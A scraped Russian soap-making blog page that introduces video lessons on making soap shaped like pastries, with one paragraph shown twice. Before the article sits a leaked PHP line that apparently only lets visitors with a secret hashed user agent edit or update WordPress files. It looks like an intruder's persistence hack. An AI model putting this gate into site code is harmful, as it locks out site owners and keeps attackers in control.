if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 10 видеоуроков, как сделать мыло в форме пирожного своими руками | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

10 видеоуроков, как сделать мыло в форме пирожного своими руками

Сегодня хочу поделиться с вами подборкой видео, как можно создать своими руками необыкновенное пирожное-мыло. Сразу возникает вопрос - будет ли такое мыло идеально походить на пирожное? Абсолютно точно - да! У многих может даже возникнуть желание съесть его

Сего­дня хочу поде­лить­ся с вами под­бор­кой видео, как мож­но создать сво­и­ми рука­ми необык­но­вен­ное пирож­ное-мыло. Сра­зу воз­ни­ка­ет вопрос — будет ли такое мыло иде­аль­но похо­дить на чудо-десерт пирож­ное? Абсо­лют­но точ­но — да! У мно­гих может даже воз­ник­нуть жела­ние съесть его.

Создать подоб­ную ком­по­зи­цию мож­но в виде воз­душ­но­го безе — пирож­но­го, тре­уголь­но­го кусоч­ка пиро­га “Лимон­ный пай” или тор­та, или маффи­нов, все зави­сит толь­ко от Вашей фан­та­зии. Для выпол­не­ния “пиро­же­но­го” пер­во­на­чаль­но добей­тесь иде­аль­но­го сов­па­де­ния цве­тов и запа­хов, напри­мер, с помо­щью жел­то­го или оран­же­во­го кра­си­те­ля, и аро­ма­ти­за­то­ра апельсина.

Совет — для более реаль­но­го созда­ния обра­за мыль­но­го пирож­но­го, исполь­зуй­те сили­ко­вую, мяг­кую, фор­му неболь­шо­го раз­ме­ра для кек­сов. А в слу­чае “Лимон­но­го пая” подой­дет клас­си­че­ская пласт­мас­со­вая тре­уголь­ная фор­ма. Раз­но­цвет­ные слои, напо­ми­на­ю­щие теп­лую раду­гу, с лег­ко­стью будут напо­ми­нать аро­мат­ное вкус­ное пироженное.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!